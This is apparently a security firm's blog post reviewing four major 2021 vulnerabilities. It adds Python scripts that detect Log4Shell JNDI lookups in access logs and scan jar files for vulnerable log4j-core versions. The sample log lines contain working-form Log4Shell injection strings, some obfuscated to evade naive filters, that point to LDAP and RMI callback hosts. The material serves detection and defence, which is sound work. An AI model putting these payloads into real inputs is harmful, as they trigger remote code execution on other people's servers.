Luiz is Director of Security Testing at Chess Group. He brings 15 years' experience leading complex security testing engagements and manages Armadillo's team of 15 cyber security consultants. He has previously been seconded to internal test teams in retail banks, and also worked as part of the Security Operations Centre at the London 2012 games. Luiz's research interest areas include phishing, social engineering and ransomware. Luiz holds an MSc in Information Security from Royal Holloway, and is an NCSC CHECK Team Leader, CREST Certified Infrastructure Tester and Certified Simulated Attack Specialist.
Luiz Simpson, Director of Security Testing, summarised the top four vulnerabilities from last year. Learn all you need to know about:
- Jump to ProxyLogon and ProxyShell >
- Jump to PrintNightmare >
- Jump to ForcedEntry >
- Jump to Log4Shell >
- Jump to Book Your Free Consultation >
2021 was the busiest year on record for reported vulnerabilities, with a number of accompanying high profile exploits. In line with previous years, the complexity of vulnerabilities continues to increase, while the window between patch release and in-the-wild exploitation keeps shrinking. Here we identify some of the top vulnerabilities which kept security and IT teams busy during 2021.
ProxyLogon and ProxyShell
In March 2021, both Microsoft and IT Professionals had a major headache in the form of an Exchange zero-day commonly known as ProxyLogon. The vulnerability, widely considered the most critical to ever hit Microsoft Exchange, was quickly exploited in the wild by suspected state-sponsored threat actors, with US government and military systems identified as the most targeted sectors. Ransomware variants such as DoejoCrypt were soon actively exploiting unpatched Exchange instances, attempting to monetise the vulnerability.
A follow-up exploit chain, dubbed ProxyShell, built on the same approach and targeted on-premises Client Access Servers (CAS) in all supported versions of Exchange Server. Because Exchange CAS is by design reachable from the internet, any unpatched instance was exposed to unauthenticated Remote Code Execution. High profile victims of the Exchange flaws included the European Banking Authority and the Norwegian Parliament.
Whilst Microsoft 365-based Exchange (Exchange Online) was not vulnerable, organisations running hybrid Exchange environments still had an on-premises server exposed, which a threat actor could compromise and then use as a foothold for lateral movement.
Microsoft quickly released patches and scanning tools to help identify and mitigate the risks. However, many smaller organisations without dedicated security teams struggled to recognise and contain the threat. As a result, the National Cyber Security Centre (NCSC) proactively reached out to organisations and provided remediation advice.
To minimise the risk of compromise, reducing Mean Time to Patch (MTTP) continues to be key, especially for critical vulnerabilities such as ProxyLogon and ProxyShell. Subscribing to services such as the NCSC Early Warning gives organisations early visibility of newly released advisories, while Endpoint Detection and Response solutions help identify suspicious activity within your infrastructure.
PrintNightmare
In June, Microsoft released a security update to address weaknesses in the Print Spooler service on Windows desktop and server platforms. When that fix proved insufficient, a further update followed out-of-band in early July, outside the standard Patch Tuesday cycle, because of the severity. Microsoft even released patches for Windows 7, an operating system that is out of support and does not normally receive updates.
Initially categorised by Microsoft as a local privilege escalation on Windows, security researchers subsequently identified an additional Remote Code Execution (RCE) vector resulting in an updated advisory from Microsoft. As ever, the ability to test and deploy patches in a time-sensitive manner is key to minimising the impact of such vulnerabilities.
PrintNightmare also had the added horror factor of dropping during the northern-hemisphere summer holiday season. Our consultants continue to see systems vulnerable to PrintNightmare on client engagements, where it can be trivially leveraged to obtain privilege escalation on unpatched Windows hosts.
ForcedEntry
Apple didn't escape critical zero-day vulnerabilities in 2021 either, with ForcedEntry made public in September. The concern was not just that it escaped the in-built sandbox controls and could be leveraged against almost all iOS versions at the time, but also that it was a zero-click exploit: no user interaction was needed. A threat actor simply required the target's phone number or Apple ID email address to send a weaponised file, masquerading as a GIF image, over iMessage. Furthermore, iMessage on macOS and watchOS was also affected, giving the exploit an attack surface of well over a billion devices.
An analysis released at the end of 2021 confirmed a highly complex exploit believed to have been created by the NSO Group, the commercial vendor behind the Pegasus platform, with sophistication comparable to that of nation-state actors. Given the nature of the attack and its complexity, such exploits are likely to be used sparingly and only against high profile, specifically targeted individuals.
Log4Shell
It would not be possible to discuss 2021 in the context of vulnerabilities without mentioning Log4Shell. A critical flaw in Log4j, a widely used Java logging library, caused headaches for security professionals worldwide, many of whom scrambled to quantify their use of Log4j across their estates.
A zero-day exploit quickly followed, confirming the worst: Remote Code Execution (RCE) was indeed possible. What made the vulnerability even more challenging was that a backend logging system could be exploited through an unaffected front-end host. For example, an attacker can submit a crafted value containing a JNDI lookup to a mobile app or web server that does not itself run Log4j; if that value is passed through and eventually logged by backend middleware which does run Log4j, the lookup is resolved there. This significantly extends the attack surface of the vulnerability, because the host that receives the request and the host that executes the payload need not be the same.
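As an added illustration of the pass-through scenario described above (this is example code, not tooling from the original article), the following Python script hunts through front-end access-log lines for the JNDI lookup strings used in Log4Shell attempts. It also flattens the nested-lookup obfuscations seen in the wild (${lower:...}, ${upper:...} and ${...:-default} tricks) that a naive search for the literal `${jndi:` misses. The log lines, IP addresses and hosts are constructed for the example, and the normalisation is a simplified model of how Log4j 2.x resolves nested lookups rather than the library's own code.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside it
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are hunting once nesting has been flattened: ${jndi:<scheme>:...}
JNDI_RE = re.compile(r"\$\{\s*jndi:\s*([a-z]+):", re.I)


def _resolve_one(body: str) -> Optional[str]:
    """Resolve one innermost lookup body the way Log4j 2.x would (simplified):
    lower/upper case conversion and ':-' default values. None leaves it as is."""
    folded = body.lower()
    if folded.startswith("jndi:"):
        return None                        # the lookup we want to keep and flag
    if folded.startswith("lower:"):
        return body[len("lower:"):].lower()
    if folded.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                       # ${env:NOPE:-j} or ${::-j} resolve to 'j'
        return body.split(":-", 1)[1]
    return None                            # ${total}, ${sys:user.home}: left untouched


def normalise(value: str, max_rounds: int = 20) -> str:
    """Flatten nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def _sub(match):
            nonlocal changed
            resolved = _resolve_one(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        value = _INNER.sub(_sub, value)
        if not changed:
            break
    return value


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, JNDI scheme, normalised line) for each hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        flat = normalise(line)
        match = JNDI_RE.search(flat)
        if match:
            hits.append((number, match.group(1).lower(), flat))
    return hits


# Constructed sample: nginx-style access log from a front end that does not run
# Log4j itself but forwards the User-Agent and query string to a Java backend.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:01:05 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:01:07 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.7 - - [10/Dec/2021:12:01:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9:1099/a}"',
    '198.51.100.4 - - [10/Dec/2021:12:02:00 +0000] "GET /price?q=${total} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, flat in find_jndi_lookups(SAMPLE_ACCESS_LOG):
        print(f"line {number}: jndi lookup via {scheme}: {flat}")
```

Lines 2, 3 and 4 of the sample are flagged (two LDAP and one RMI callback); line 5's `${total}` is an ordinary template placeholder and is left alone. Run the same logic over the logs of the front-end tier, not just the Java hosts, since that is where the crafted value first appears; the actual callback, if any, leaves the backend host, so egress logs for LDAP, RMI and DNS traffic to unexpected destinations are the complementary signal.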
The NCSC even took the step of recommending that the update be applied immediately, whether or not Log4j was known to be in use. As is common with critical vulnerabilities, two further Log4j patches followed within a week of the original, addressing a Denial of Service (DoS) and a further RCE. This further increased the workload of security and IT teams just as they thought the worst of 2021 was behind them.
Naturally, it was only a matter of time before ransomware gangs leveraged Log4Shell for profit, and since the start of 2022 we have seen yet more variants hunting for outdated Log4j instances. Detecting the vulnerability with an unauthenticated remote scan is not trivial: the vulnerable code is only reached when a controlled value is actually logged, and the callback may come from a different host to the one scanned. Authenticated scans which search the filesystem for affected libraries and validate package versions are preferable.
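As an added example rather than the article's own tooling, the following Python script implements the authenticated, file-based check described above. It walks a directory tree, opens every .jar it finds, reads the version recorded in log4j-core's Maven pom.properties and checks whether the JndiLookup class is still present (removing that class was the stop-gap mitigation the Log4j project recommended where an immediate update was not possible). The affected range (2.0-beta9 up to but excluding 2.17.1) follows the Log4j project's own advisories; the jars it scans are constructed fixtures written to a temporary directory, and the verdict labels are this example's own.

```python
import os
import re
import tempfile
import zipfile

# Markers inside a log4j-core jar (these are the real paths in the official artefacts)
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

_VER = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.I)
_STAGE = {"beta": 0, "rc": 1, None: 2}   # pre-releases sort before the final release


def version_key(version):
    """Turn '2.0-beta9' / '2.0-rc1' / '2.14.1' into a sortable tuple, or None."""
    m = _VER.match(version.strip())
    if not m:
        return None
    major, minor, patch, stage, num = m.groups()
    return (int(major), int(minor), int(patch or 0), _STAGE[stage and stage.lower()], int(num or 0))


FIRST_AFFECTED = version_key("2.0-beta9")   # JNDI lookup support was introduced here
FIXED = version_key("2.17.1")               # last of the December 2021 fixes


def classify(version, has_jndi_class):
    """Verdict for one jar from its recorded version and the presence of JndiLookup."""
    key = version_key(version) if version else None
    if key is None:
        return "version-unknown-jndi-present" if has_jndi_class else "version-unknown"
    if key < FIRST_AFFECTED:
        return "not-affected"
    if key >= FIXED:
        return "patched"
    return "vulnerable" if has_jndi_class else "mitigated-update-still-needed"


def inspect_jar(path):
    """Return (version, has_jndi_class) for a jar carrying log4j-core, else None."""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
    except zipfile.BadZipFile:
        return None                       # corrupt or non-zip file: skip, do not abort
    if POM_PROPS not in names and JNDI_CLASS not in names:
        return None                       # no trace of log4j-core (shaded or otherwise)
    return version, JNDI_CLASS in names


def scan_tree(root):
    """Yield (path, version, verdict) for every jar under root that carries log4j-core."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jar"):
                path = os.path.join(dirpath, name)
                found = inspect_jar(path)
                if found:
                    yield path, found[0], classify(*found)


def _write_jar(path, version=None, include_jndi_class=True):
    """Constructed fixture: a minimal jar carrying only the markers we inspect."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                   f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only, never loaded


def demo():
    """Build a constructed sample tree in a temp dir and return {jar name: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "lib")
        _write_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
        _write_jar(os.path.join(lib, "log4j-core-2.14.1-stripped.jar"), "2.14.1", include_jndi_class=False)
        _write_jar(os.path.join(lib, "log4j-core-2.0-rc1.jar"), "2.0-rc1")
        _write_jar(os.path.join(lib, "log4j-core-2.17.1.jar"), "2.17.1")
        _write_jar(os.path.join(lib, "shaded-app.jar"))                 # bundled copy, no pom.properties
        _write_jar(os.path.join(lib, "commons-lang3-3.12.0.jar"), include_jndi_class=False)
        with open(os.path.join(lib, "broken.jar"), "wb") as fh:        # corrupt archive must not abort the scan
            fh.write(b"not a zip")
        return {os.path.basename(p): verdict for p, _, verdict in scan_tree(root)}


if __name__ == "__main__":
    for jar, verdict in demo().items():
        print(f"{verdict:32s} {jar}")
```

Two simplifications to be aware of before running this against a real estate: it does not descend into jars nested inside .war or .ear archives, and it treats everything below 2.17.1 as needing an update, so the fully fixed Java 6 and 7 backport releases on the 2.3.x and 2.12.x branches would be reported as vulnerable and need a manual check. Inspecting the jar rather than trusting the file name is deliberate: renamed and shaded copies keep the pom.properties and class paths even when the file name says nothing about Log4j.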
To learn more about how you can protect your organisation, book your free 30-minute security consultation with one of our penetration testers. Get agnostic advice from industry experts on how to secure your business. Request here >